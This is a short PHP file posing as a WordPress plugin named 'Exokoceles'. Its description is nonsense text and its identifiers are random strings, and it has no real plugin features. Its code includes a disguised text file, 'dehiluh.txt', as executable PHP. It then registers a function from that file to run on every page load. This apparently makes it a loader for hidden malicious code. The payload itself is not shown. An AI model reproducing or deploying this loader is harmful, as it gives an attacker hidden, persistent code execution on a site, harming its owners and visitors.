<?php

/**
 * Plugin Name: Exokoceles
 * Plugin URI: https://siagro616.fr/exokoceles
 * Description: Provider. Generally, populations returned from the Latin aprica, meaning "sunny.
 * Version: 2.4.9
 * Author: Hans Rudolf
 * Author URI: https://siagro616.fr
 * Text Domain: exokoceles
 * License: GPL2+
 *
 */

function isejem_ykhyvuso() {
    laqywy_cachylozhid();
}

$pazaqi = __DIR__ . '/dehiluh.txt';
if (file_exists($pazaqi)) {
    include($pazaqi);
}

if (function_exists("laqywy_cachylozhid")) {
    $ygytizh = new lojiqy_apujothychi();
    if ($ygytizh->utikec_oludoxeq()) {
        add_action('init', 'isejem_ykhyvuso');
    }
}